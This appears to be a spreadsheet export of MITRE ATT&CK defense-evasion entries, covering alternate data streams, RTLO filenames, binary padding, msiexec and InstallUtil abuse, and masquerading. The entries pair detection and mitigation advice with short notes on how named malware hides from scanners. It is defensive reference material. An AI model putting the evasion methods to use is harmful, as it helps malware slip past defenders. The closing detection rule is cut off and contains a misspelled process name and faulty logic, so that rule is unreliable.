There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
OS API Execution
Monitor calls to the &lt;code&gt;ZwSetEaFile&lt;/code&gt; and &lt;code&gt;ZwQueryEaFile&lt;/code&gt; Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
Restrict File and Directory Permissions
Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded. (Citation: InsiderThreat NTFS EA Oct 2017)
APT32
[APT32](https://attack.mitre.org/groups/G0050) used NTFS alternate data streams to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) has used NTFS to hide files.(Citation: Cyberreason Anchor December 2019)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) can abuse alternate data streams (ADS) to store content for malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) has copied itself to the &lt;code&gt;:bin&lt;/code&gt; alternate data stream of a newly created file.(Citation: Crowdstrike Indrik November 2018)
DEADEYE
The DEADEYE.EMBED variant of [DEADEYE](https://attack.mitre.org/software/S1052) can embed its payload in an alternate data stream of a local file.(Citation: Mandiant APT41)
Expand
[Expand](https://attack.mitre.org/software/S0361) can be used to download or copy a file into an alternate data stream.(Citation: LOLBAS Expand)
Gazer
[Gazer](https://attack.mitre.org/software/S0168) stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.(Citation: ESET Gazer Aug 2017)
LoJax
[LoJax](https://attack.mitre.org/software/S0397) has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.(Citation: ESET LoJax Sept 2018)
POWERSOURCE
If the victim is using PowerShell 3.0 or later, [POWERSOURCE](https://attack.mitre.org/software/S0145) writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in &lt;code&gt;%PROGRAMDATA%\Windows\&lt;/code&gt;.(Citation: Cisco DNSMessenger March 2017)
PowerDuke
[PowerDuke](https://attack.mitre.org/software/S0139) hides many of its backdoor payloads in an alternate data stream (ADS).(Citation: Volexity PowerDuke November 2016)
Regin
The [Regin](https://attack.mitre.org/software/S0019) malware platform uses Extended Attributes to store encrypted executables.(Citation: Kaspersky Regin)
Valak
[Valak](https://attack.mitre.org/software/S0476) has the ability save and execute files as alternate data streams (ADS).(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)(Citation: SentinelOne Valak June 2020)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) has the ability to save and execute files as an alternate data stream (ADS).(Citation: Sentinel Labs WastedLocker July 2020)
Zeroaccess
Some variants of the [Zeroaccess](https://attack.mitre.org/software/S0027) Trojan have been known to store data in Extended Attributes.(Citation: Ciubotariu 2014)
esentutl
[esentutl](https://attack.mitre.org/software/S0404) can be used to read and write alternate data streams.(Citation: LOLBAS Esentutl)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for files written to disk that contain two file extensions, particularly when the second is an executable.
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.
Operating System Configuration
Disable the default to “hide file extensions for known file types” in Windows OS.(Citation: Seqrite DoubleExtension)(Citation: HowToGeek ShowExtension)
User Training
Train users to look for double extensions in filenames, and in general use training as a way to bring awareness to common phishing and spearphishing techniques and how to raise suspicion for potentially malicious events.
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used an additional filename extension to hide the true file type.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)
Bazar
The [Bazar](https://attack.mitre.org/software/S0534) loader has used dual-extension executable files such as PreviewReport.DOC.exe.(Citation: Cybereason Bazar July 2020)
Milan
[Milan](https://attack.mitre.org/software/S1015) has used an executable named `companycatalog.exe.config` to appear benign.(Citation: ClearSky Siamesekitten August 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Monitor for common formats of RTLO characters within filenames such as \u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used Right-to-Left Override to deceive victims into executing several strains of malware.(Citation: Trend Micro Tick November 2019)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used right-to-left-override to obfuscate the filenames of malicious e-mail attachments.(Citation: TrendMicro BlackTech June 2017)
Ferocious Kitten
[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones.(Citation: Kaspersky Ferocious Kitten Jun 2021)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.(Citation: Mandiant Operation Ke3chang November 2014)
Scarlet Mimic
[Scarlet Mimic](https://attack.mitre.org/groups/G0029) has used the left-to-right override character in self-extracting RAR archive spearphishing attachment file names.(Citation: Scarlet Mimic Jan 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.
APT29
[APT29](https://attack.mitre.org/groups/G0016) used large size files to avoid detection by security solutions with hardcoded size limits.(Citation: SentinelOne NobleBaron June 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) includes garbage code to mislead anti-malware software and researchers.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) downloader code has included "0" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has added extra spaces between JavaScript code characters to increase the overall file size.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has used random junk code to obfuscate malware code.(Citation: Mandiant FIN7 Apr 2022)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has obfuscated .NET executables by inserting junk code.(Citation: ESET Gamaredon June 2020)	
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) performed padding with null bytes before calculating its hash.(Citation: Zscaler Higaisa 2020)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has inserted garbage characters into code, presumably to avoid anti-virus detection.(Citation: Proofpoint Leviathan Oct 2017)
Moafee
[Moafee](https://attack.mitre.org/groups/G0002) has been known to employ binary padding.(Citation: Haq 2014)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used junk code within their DLL files to hinder analysis.(Citation: Avira Mustang Panda January 2020)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) apparently altered [NDiskMonitor](https://attack.mitre.org/software/S0272) samples by adding four bytes of random letters in a likely attempt to change the file hashes.(Citation: TrendMicro Patchwork Dec 2017)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has appended random binary data to the end of itself to generate a large binary.(Citation: Talos Bisonal Mar 2020) 
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) had added data prior to the Portable Executable (PE) header to prevent automatic scanners from identifying the payload.(Citation: Check Point Black Basta October 2022)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) contains unused machine instructions in a likely attempt to hinder analysis.(Citation: FireEye APT28)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.(Citation: Palo Alto Comnie)
CostaBricks
[CostaBricks](https://attack.mitre.org/software/S0614) has added the entire unobfuscated code of the legitimate open source application Blink to its code.(Citation: BlackBerry CostaRicto November 2020)
Emissary
A variant of [Emissary](https://attack.mitre.org/software/S0082) appends junk data to the end of its DLL file to create a large file that may exceed the maximum size that anti-virus programs can scan.(Citation: Emissary Trojan Feb 2016)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) has been packed with junk code and strings.(Citation: ESET Dukes October 2019)
FinFisher
[FinFisher](https://attack.mitre.org/software/S0182) contains junk code in its functions in an effort to confuse disassembly programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can use junk code to hide functions and evade detection.(Citation: ESET Gelsemium June 2021)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has had null characters padded in its malicious DLL payload.(Citation: Cybereason Cobalt Kitty 2017)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) has added BMP images to the resources section of its Portable Executable (PE) file increasing each binary to at least 300MB in size.(Citation: ESET Grandoreiro April 2020)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) has the ability to add bytes to change the file hash.(Citation: Group IB GrimAgent July 2021)
Javali
[Javali](https://attack.mitre.org/software/S0528) can use large obfuscated libraries to hinder detection and analysis.(Citation: Securelist Brazilian Banking Malware July 2020)
Kwampirs
Before writing to disk, [Kwampirs](https://attack.mitre.org/software/S0236) inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.(Citation: Symantec Orangeworm April 2018)
Maze
[Maze](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) has used useless code blocks to counter analysis.(Citation: TrendMicro POWERSTATS V3 June 2019)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use large file sizes to evade detection.(Citation: Trend Micro Qakbot May 2020)(Citation: Group IB Ransomware September 2020)
Rifdoor
[Rifdoor](https://attack.mitre.org/software/S0433) has added four additional bytes of data upon launching, then saved the changed version as &lt;code&gt;C:\ProgramData\Initech\Initech.exe&lt;/code&gt;.(Citation: Carbon Black HotCroissant April 2020)
SamSam
[SamSam](https://attack.mitre.org/software/S0370) has used garbage code to pad some of its malware components.(Citation: Sophos SamSam Apr 2018)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can obfuscate strings using junk Chinese characters.(Citation: Morphisec Snip3 May 2021)
TAINTEDSCRIBE
[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) can execute &lt;code&gt;FileRecvWriteRand&lt;/code&gt; to append random bytes to the end of a file received from C2.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) contains junk code to increase its entropy and hide the actual code.(Citation: NCC Group WastedLocker June 2020)
XTunnel
A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)
ZeroT
[ZeroT](https://attack.mitre.org/software/S0230) has obfuscated DLLs and functions using dummy API calls inserted between real instructions.(Citation: Proofpoint ZeroT Feb 2017)
yty
[yty](https://attack.mitre.org/software/S0248) contains junk code in its binary, likely to confuse malware analysts.(Citation: ASERT Donot March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.
Process Creation
Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity
Disable or Remove Feature or Program
InstallUtil may not be necessary within a given environment.
Execution Prevention
Use application control configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used &lt;code&gt;InstallUtil.exe&lt;/code&gt; to execute a malicious Beacon stager.(Citation: Anomali MUSTANG PANDA October 2019)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has used &lt;code&gt;InstallUtil.exe&lt;/code&gt; to execute malicious software.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used Installutill to download content.(Citation: Cybereason Chaes Nov 2020)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) had used `InstallUtil.exe` to download and deploy executables.(Citation: Malwarebytes Saint Bot April 2021)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) has used `InstallUtil.exe` as part of its process to disable Windows Defender.(Citation: Unit 42 WhisperGate January 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may gather information about the victim's DNS that can be used during targeting.
File Creation
Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as &lt;code&gt;services.msc&lt;/code&gt; or &lt;code&gt;eventvwr.msc&lt;/code&gt;. Invoking non-Microsoft .msc files may be an indicator of malicious activity.
Process Creation
Monitor processes for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious.
Disable or Remove Feature or Program
MMC may not be necessary within a given environment since it is primarily used by system administrators, not regular users or clients. 
Execution Prevention
Use application control configured to block execution of MMC if it is not required for a given system or network to prevent potential misuse by adversaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Network Connection Creation
Monitor for newly constructed network connections that are sent or received by untrusted hosts. 
Process Creation
Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files.
Disable or Remove Feature or Program
Consider disabling the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy to prevent elevated execution of Windows Installer packages.(Citation: Microsoft AlwaysInstallElevated 2018)
Privileged Account Management
Restrict execution of Msiexec.exe to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.
Machete
[Machete](https://attack.mitre.org/groups/G0095) has used msiexec to install the [Machete](https://attack.mitre.org/software/S0409) malware.(Citation: 360 Machete Sep 2020)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has used msiexec.exe to execute an MSI payload.(Citation: Unit42 Molerat Mar 2020) 
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) has used &lt;code&gt;msiexec&lt;/code&gt; to download and execute malicious installer files over HTTP.(Citation: Rancor Unit42 June 2018)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used &lt;code&gt;msiexec&lt;/code&gt; to download and execute malicious Windows Installer files.(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)(Citation: Trend Micro TA505 June 2019)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used the msiexec.exe command-line utility to download and execute malicious MSI files.(Citation: Zscaler APT31 Covid-19 October 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has been installed via MSI installer.(Citation: CISA AppleJeus Feb 2021)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used .MSI files as an initial way to start the infection chain.(Citation: Cybereason Chaes Nov 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) can use msiexec.exe to disable security tools on the system.(Citation: Cybereason Clop Dec 2020) 
DEADEYE
[DEADEYE](https://attack.mitre.org/software/S1052) can use `msiexec.exe` for execution of malicious DLL.(Citation: Mandiant APT41)
Duqu
[Duqu](https://attack.mitre.org/software/S0038) has used &lt;code&gt;msiexec&lt;/code&gt; to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.(Citation: Kaspersky Duqu 2.0)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has been installed via `msiexec.exe`.(Citation: Korean FSI TA505 2020) 
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can use MSI files to execute DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application. (Citation: Juniper IcedID June 2020)
Javali
[Javali](https://attack.mitre.org/software/S0528) has used the MSI installer to download and execute malicious payloads.(Citation: Securelist Brazilian Banking Malware July 2020)
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)	
Maze
[Maze](https://attack.mitre.org/software/S0449) has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using &lt;code&gt;msiexec&lt;/code&gt;.(Citation: Sophos Maze VM September 2020)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) can use MSI files with embedded VBScript for execution.(Citation: Securelist Brazilian Banking Malware July 2020)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has used MsiExec.exe to automatically execute files.(Citation: Fortinet Metamorfo Feb 2020)(Citation: ESET Casbaneiro Oct 2019) 
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use MSIExec to spawn multiple cmd.exe processes.(Citation: Crowdstrike Qakbot October 2020)
RCSession
[RCSession](https://attack.mitre.org/software/S0662) has the ability to execute inside the msiexec.exe process.(Citation: Profero APT27 December 2020)
Ragnar Locker
[Ragnar Locker](https://attack.mitre.org/software/S0481) has been delivered as an unsigned MSI package that was executed with &lt;code&gt;msiexec.exe&lt;/code&gt;.(Citation: Sophos Ragnar May 2020)
RemoteUtilities
[RemoteUtilities](https://attack.mitre.org/software/S0592) can use Msiexec to install a service.(Citation: Trend Micro Muddy Water March 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command monitoring may reveal malicious attempts to modify trust settings, such as the installation of root certificates or modifications to trust attributes/policies applied to files.
File Metadata
Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.
File Modification
Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries.(Citation: SpectorOps Subverting Trust Sept 2017) Also analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017)
On macOS, the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.
Module Load
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Process Creation
Monitor processes and arguments for malicious attempts to modify trust settings, such as the installation of root certificates or modifications to trust attributes/policies applied to files.
Windows Registry Key Creation
Monitoring the creation of (sub)keys within the Windows Registry may reveal malicious attempts to modify trust settings, such as the installation of root certificates. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072
Windows Registry Key Modification
Monitoring changes to the Windows Registry may reveal malicious attempts to modify trust settings, such as the installation of root certificates. Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;/code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker) Also consider enabling the Registry Global Object Access Auditing (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers:(Citation: Microsoft Audit Registry July 2012) 
Execution Prevention
System settings can prevent applications from running that haven't been downloaded through the Apple Store (or other legitimate repositories) which can help mitigate some of these issues. Also enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious content.
Operating System Configuration
Windows Group Policy can be used to manage root certificates and the &lt;code&gt;Flags&lt;/code&gt; value of &lt;code&gt;HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots&lt;/code&gt; can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)
Restrict Registry Permissions
Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented.
Software Configuration
HTTP Public Key Pinning (HPKP) is one method to mitigate potential [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used digital certificates to deliver malware.(Citation: Novetta-Axiom)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.
Module Load
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
Process Creation
Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.
Disable or Remove Feature or Program
Odbcconf.exe may not be necessary within a given environment.
Execution Prevention
Use application control configured to block execution of Odbcconf.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used &lt;code&gt;odbcconf&lt;/code&gt; to proxy the execution of malicious DLL files.(Citation: TrendMicro Cobalt Group Nov 2017)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use `odbcconf.exe` to run DLLs on targeted hosts.(Citation: Cybereason Bumblebee August 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Monitor for spaces at the end of file names, that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.(Citation: synack 2016 review)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to gather common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
File Creation
Monitor for newly constructed files for payloads
File Metadata
Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.
Process Creation
Monitor for newly constructed processes and/or command-lines that look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system. Typically these should only be used in specific and limited cases, like for software development.
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has compiled the source code for a downloader directly on the infected system using the built-in &lt;code&gt;Microsoft.CSharp.CSharpCodeProvider&lt;/code&gt; class.(Citation: ESET Gamaredon June 2020)	
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used the .NET csc.exe tool to compile executables from downloaded C# code.(Citation: ClearSky MuddyWater Nov 2018)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).(Citation: Anomali Rocke March 2019)	
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.(Citation: PaloAlto CardinalRat Apr 2017)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) has used the &lt;code&gt;csc.exe&lt;/code&gt; tool to compile a C# executable.(Citation: Prevailion DarkWatchman 2021) 
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can compile and execute source code sent to the compromised AD FS server via a specific HTTP POST.(Citation: MSTIC FoggyWeb September 2021)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) has used AutoIt to compile the payload and main script into a single executable after delivery.(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities.
File Metadata
Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity.
File Modification
Monitor for changes made to files for unexpected modifications to file names that are mismatched between the file name on disk and that of the binary's PE metadata. This is a likely indicator that a binary was renamed after it was compiled.  
Note: There are no standard Windows events for file modification. However, Event ID 4663 (An attempt was made to access an object) can be used to audit and alert on attempts to access system utility binaries; the “Accesses” field can be used to filter by type of access (e.g., MODIFY vs DELETE). 
Process Metadata
Monitor for file names that are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. 
Restrict File and Directory Permissions
Use file system access controls to protect folders such as C:\Windows\System32.
APT32
[APT32](https://attack.mitre.org/groups/G0050) has moved and renamed pubprn.vbs to a .txt file to avoid detection.(Citation: Twitter ItsReallyNick APT32 pubprn Masquerade)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used a renamed cmd.exe file to evade detection.(Citation: Cybereason Soft Cell June 2019)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has renamed system utilities such as &lt;code&gt;wscript.exe&lt;/code&gt; and &lt;code&gt;mshta.exe&lt;/code&gt;.(Citation: Qualys LolZarus)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has renamed [certutil](https://attack.mitre.org/software/S0160) and moved it to a different location on the system to avoid detection based on use of the tool.(Citation: FireEye APT10 Sept 2018)
CozyCar
The [CozyCar](https://attack.mitre.org/software/S0046) dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file.(Citation: F-Secure CozyDuke)
Kevin
[Kevin](https://attack.mitre.org/software/S1020) has renamed an image of `cmd.exe` with a random name followed by a `.tmpl` extension.(Citation: Kaspersky Lyceum October 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
Image Metadata
In containerized environments, use image IDs and layer hashes to compare images instead of relying only on their names.(Citation: Docker Images) Monitor for the unexpected creation of new resources within your cluster in Kubernetes, especially those created by atypical users.
Process Creation
Monitor for newly executed processes that may match or approximate the name or location of legitimate files or resources when naming/placing them. Looks for mismatches between process names and their image paths.Malware authors often use this technique to hide malicious executables behind legitimate Windows executable names (e.g. lsass.exe, svchost.exe, etc).
There are several sub-techniques, but this analytic focuses on [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) only.
Note: With process monitoring, hunt for processes matching these criteria:
- process name is svchost.exe, smss.exe, wininit.exe, taskhost.exe, etc.
- process path is not C:\Windows\System32\ or C:\Windows\SysWow64\
Examples (true positive):
C:\Users\administrator\svchost.exe
To make sure the rule doesn’t miss cases where the executable would be started from a sub-folder of these locations, the entire path is checked for the process path. The below example should be considered as suspicious: C:\Windows\System32\srv\svchost.exe
&lt;h4&gt;Analytic 1 - Common Windows Process Masquerading &lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter processes where (
  (exe=svchost.exe AND (image_path!="C:\\Windows\\System32\\svchost.exe" OR process_path!="C:\\Windows\\SysWow64\\svchost.exe"))
  OR (exe=smss.exe AND image_path!="C:\\Windows\\System32\\smss.exe")
  OR (exe=wininit.exe AND image_path!="C:\\Windows\\System32\\wininit.exe")
  OR (exe=taskhost.exe AND image_path!="C:\\Windows\\System32\\taskhost.exe")
  OR (exe=lasass.exe AND image_path!="C:\\Windows\\System32\\lsass.exe")
  OR (exe=winlogon.exe AND image_path!="C:\\Windows\\System32\\winlogon.exe")
  OR (exe=csrss.exe AND image_path!="C:\\Windows\\System32\\csrss.exe")
  OR (exe=services.exe AND image_path!="C:\\Windows\\System32\\services.exe")
